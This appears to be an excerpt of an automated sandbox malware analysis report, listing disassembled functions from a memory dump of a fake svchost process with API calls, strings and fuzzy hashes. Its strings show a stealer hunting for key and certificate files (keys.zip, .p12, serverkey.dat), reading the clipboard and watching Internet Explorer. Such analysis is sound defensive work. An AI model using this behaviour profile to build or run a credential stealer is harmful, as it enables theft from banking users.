                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileReadmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1163090680-0
                                                                                                                                                                                                              • Opcode ID: bba7e734f26445d34a0d998cb8b2ea7a35965f7e5390324a39ac11b80baff7ce
                                                                                                                                                                                                              • Instruction ID: f30b4d6acab42b1160061a19f1da8c3583245b15bdb5bf6f2fbd8aca9dd43ccf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bba7e734f26445d34a0d998cb8b2ea7a35965f7e5390324a39ac11b80baff7ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB1154B27007045FD720CA6ADC84A6BB7EAEFD4254B14892DE646C7B00D731E8048B64
                                                                                                                                                                                                              Function 02668BC0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1a4f78453f45bad8d9103c3386f88e52845fd51b89d1a927d807f652db689c27
                                                                                                                                                                                                              • Instruction ID: da5b861d29410c5d8f96b31268623ad865170637e79d796c4f726b8f8194377f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a4f78453f45bad8d9103c3386f88e52845fd51b89d1a927d807f652db689c27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF01CB8111300AEEB58CF31D65DF6A77D1AB853A9F8AD0C9D0044F6A2CB78C449DF51
                                                                                                                                                                                                              Function 026472E0 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,0265E2D2), ref: 026472F4
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$ConvertCreateFileFreeInfoLocalNamedSaclString
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2757955739-0
                                                                                                                                                                                                              • Opcode ID: be48e32782f2c8b65a992b8fb8eea589b12bcaaed0afbce947d2ea2cb8a389a7
                                                                                                                                                                                                              • Instruction ID: 73053a7063919e76b69457ce42624b572848d9ea7460e67eec187f566b90254d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be48e32782f2c8b65a992b8fb8eea589b12bcaaed0afbce947d2ea2cb8a389a7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4D012357C022031F23321283D9FFAA54544746F74F624754FBA1BE1C0DAC0184205D9

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 0264D300 Relevance: 101.9, APIs: 55, Strings: 3, Instructions: 429windowsynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0264D35F
                                                                                                                                                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0264D36A
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 0264D37D
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0264D392
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 0264D3A1
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,-00000008), ref: 0264D3AD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264D3BC
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264D3C7
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 0264D3DA
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0264D418
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 0264D428
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 0264D437
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0264D44F
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0264D459
                                                                                                                                                                                                              • CreateFontIndirectA.GDI32 ref: 0264D46F
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 0264D47F
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 0264D4B7
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 0264D4BA
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 0264D4CE
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0264D533
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000116,?,00000200), ref: 0264D55D
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0264D569
                                                                                                                                                                                                              • MoveWindow.USER32(?,00000009,00000014,000000FC,00000014,00000001), ref: 0264D585
                                                                                                                                                                                                              • CreateWindowExA.USER32(00000000,static,00000000,50000003,?,0000000A,00000023,00000027,?,00000000,00000000,00000000), ref: 0264D5AA
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F4,?), ref: 0264D5BC
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 0264D5C5
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 0264D5D4
                                                                                                                                                                                                              • GetWindowTextLengthA.USER32(00000000), ref: 0264D5DB
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,0000000C), ref: 0264D5EF
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 0264D613
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 0264D620
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0264D630
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000DE), ref: 0264D64C
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000F2), ref: 0264D655
                                                                                                                                                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0264D661
                                                                                                                                                                                                              • SendMessageA.USER32(00000000,00000172,00000001,00000000), ref: 0264D67B
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0264D6A4
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0264D6B3
                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000027), ref: 0264D6C6
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 0264D6E9
                                                                                                                                                                                                              • IsIconic.USER32(?), ref: 0264D707
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001), ref: 0264D714
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264D723
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264D73B
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: GetWindowThreadProcessId.USER32(?,00000000), ref: 0264D2BC
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: GetCurrentThreadId.KERNEL32 ref: 0264D2C4
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0264D2D0
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: SendMessageA.USER32(?,0000000D,?,?), ref: 0264D2E1
                                                                                                                                                                                                                • Part of subcall function 0264D2B0: AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0264D2ED
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0264D748
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 0264D7B7
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000), ref: 0264D7BE
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0264D7CE
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0264D7E8
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 0264D7FD
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000EB), ref: 0264D80C
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0264D818
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0264D827
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000), ref: 0264D82E
                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0264D843
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$ClassMessage$SendThread$ItemObject$AttachCreateHeapInputMutexProcessRectReleaseSingleTextWait$AllocClientCurrentDeleteDestroyDialogFontFreeIconIconicIndirectInfoLengthLoadMovePostShow
                                                                                                                                                                                                              • String ID: '$<$static
                                                                                                                                                                                                              • API String ID: 2592195760-1233416523
                                                                                                                                                                                                              • Opcode ID: 865bc104178a5aa41c9a8156c16a0597932535fb72804ccead744f9e14ad6f08
                                                                                                                                                                                                              • Instruction ID: 566667cbb3bd4efe46a7ffc9580c64020c05d598627e899280616c5d654a4565
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 865bc104178a5aa41c9a8156c16a0597932535fb72804ccead744f9e14ad6f08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADE1A371984300BFD3208F64EC88F6E37E8EB99725F611B18F556E72C0CB7494918B62
                                                                                                                                                                                                              Function 02662BB0 Relevance: 61.6, APIs: 27, Strings: 8, Instructions: 379COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02662BCE
                                                                                                                                                                                                              • memset.MSVCRT ref: 02662BE8
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02662C12
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02662C37
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02662C77
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02662C81
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662C89
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02662C9A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02662CA1
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 02662CE4
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000), ref: 02662D30
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277,00000000,00000000), ref: 02662D77
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorFileLastmemset$AdminAttributesCreateCurrentFolderMakeModuleNameSystemUser
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$\$\SIGN1\$client.zip$keys.zip$path_client.txt$path_keys.txt
                                                                                                                                                                                                              • API String ID: 1576442920-364364218
                                                                                                                                                                                                              • Opcode ID: ba98260089f648cd5c90a878f449df96fee2610ab0dfddb087e80b928a55b082
                                                                                                                                                                                                              • Instruction ID: 70fd554052f18584afca2d4dc271b5cc8f578210a5ad4eff6b61615c47e3f586
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba98260089f648cd5c90a878f449df96fee2610ab0dfddb087e80b928a55b082
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6D10370944249AFDB258F249C6CBFA7BE9AF45300F148699ECC6D7341EF719988CB90
                                                                                                                                                                                                              Function 0265D120 Relevance: 56.3, APIs: 24, Strings: 8, Instructions: 346fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265D13F
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265D161
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0265D176
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0265D18F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0265D1D8
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 0265D1EB
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0265D24D
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 0265D563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DriveErrorModememset$CurrentDirectoryFileFindFirstLogicalStringsType
                                                                                                                                                                                                              • String ID: *.00*$.txt$.zip$8A99A689$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 989413159-1398107332
                                                                                                                                                                                                              • Opcode ID: 34c7e394ed5e7ae99481aeeacdd3066171b0c97f9dcb9add63d28f61611cabfd
                                                                                                                                                                                                              • Instruction ID: a86dc9a74ab58c97b754517b97187fd0f400cd249b8517e7a2b9cf70a1030490
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34c7e394ed5e7ae99481aeeacdd3066171b0c97f9dcb9add63d28f61611cabfd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0C19F705083569FC725CB249868BAFBBE5AF89304F448A5DE9C6C7380EB31D548CB92
                                                                                                                                                                                                              Function 02641170 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 203memorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264118E
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F570), ref: 026411AD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 026411C5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 026411DB
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.p12,00000000), ref: 026411FF
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02641221
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0264123E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02641245
                                                                                                                                                                                                              • memset.MSVCRT ref: 02641255
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02641271
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265B4B0,00000000,00000000,00000000), ref: 02641285
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,serverkey.dat,00000000), ref: 026412A4
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 026412D5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 026412F2
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026412F9
                                                                                                                                                                                                              • memset.MSVCRT ref: 02641309
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02641325
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265EB30,00000000,00000000,00000000), ref: 02641339
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,026601A0,00000000,00000000,00000000), ref: 02641376
                                                                                                                                                                                                                • Part of subcall function 0265B410: PathAddBackslashA.SHLWAPI(8a99a6dd), ref: 0265B437
                                                                                                                                                                                                                • Part of subcall function 0265B410: PathFileExistsA.SHLWAPI(?), ref: 0265B4A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0264138E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0264139F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharHeapMultiWide$CreateThreadmemset$AllocFileHandlePathProcess$BackslashCloseExistsInformationModuleName
                                                                                                                                                                                                              • String ID: .exe$.p12$java$serverkey.dat
                                                                                                                                                                                                              • API String ID: 183229269-3502489836
                                                                                                                                                                                                              • Opcode ID: 04c7b430c886aee2fbf5ecf9f481219a79a87800e069fcb35c23d6e1f38a10d9
                                                                                                                                                                                                              • Instruction ID: d8a6f5b5727a44a251e03311a524a1dee74bcbc7adf181fdfc0cbb7351b392e9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04c7b430c886aee2fbf5ecf9f481219a79a87800e069fcb35c23d6e1f38a10d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A51C631A853257AFF315A608C49FAF3E6CAF02B94F550354BD49E52C4DF6094C4C6A5
                                                                                                                                                                                                              Function 0266DA50 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 297stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FolderPathSpecialstrchr
                                                                                                                                                                                                              • String ID: Desk$Network Favorites$\$o$p$t
                                                                                                                                                                                                              • API String ID: 2246752426-2295261572
                                                                                                                                                                                                              • Opcode ID: 1887be1576ed24b99835167eb56b0d640bde5376f00ee16ecf3eee58d64f257b
                                                                                                                                                                                                              • Instruction ID: 3c593f06ec897b74c1f3be9b18b6987d3672d02d43ba14dfceed3b97e8ce7eb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1887be1576ed24b99835167eb56b0d640bde5376f00ee16ecf3eee58d64f257b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEA15C71B04259AFDB21CB24CC58FFE7775EF85300F1446D5EA499B280EB71AA45CB90
                                                                                                                                                                                                              Function 02653220 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 173memorythreadclipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0265325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0265327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02653286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 0265329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 026532AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 026532D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 026532FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02653301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02653311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 0265332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0265338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02653399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 026533DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: 998f2e9a813646ea198bc65db741c7c1cfb25bfa1af1fa9daaf4046f188f6834
                                                                                                                                                                                                              • Instruction ID: 45cedd927b9c066075aa5a8fcdd70164609483bddfa7adcedaf700a2110a8ad4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 998f2e9a813646ea198bc65db741c7c1cfb25bfa1af1fa9daaf4046f188f6834
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96513432604361ABD7219F249C9CF6F7BA8EFC6B94F010758FC8697380DF21D52486A6
                                                                                                                                                                                                              Function 02651900 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(\iexplore.exe), ref: 0265190E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000), ref: 02651915
                                                                                                                                                                                                              • memset.MSVCRT ref: 02651990
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02651999
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,76F8F550,76F91620,80000002), ref: 026519E3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026519E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026519F3
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026519F6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651A06
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02651A20
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02651A4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02651A52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02651A5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02651A62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatestrstr$AdminCommandLineUsermemset
                                                                                                                                                                                                              • String ID: \iexplore.exe$set_url
                                                                                                                                                                                                              • API String ID: 2523706361-3242205626
                                                                                                                                                                                                              • Opcode ID: a7ad56b85bc9ee7abb9adab73fcbe32a759f5365f4e3b88610e160150738bd6a
                                                                                                                                                                                                              • Instruction ID: da55af54ede3da3e44a0c5aa198045587fefedee73cdbdfd41c0ef41047c2fbc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7ad56b85bc9ee7abb9adab73fcbe32a759f5365f4e3b88610e160150738bd6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58310731E8137167E72236705C49F6F3A889F02B15F5606A8FC4AA7341EBA4C8408AF6
                                                                                                                                                                                                              Function 02642BA0 Relevance: 21.5, APIs: 14, Instructions: 466COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
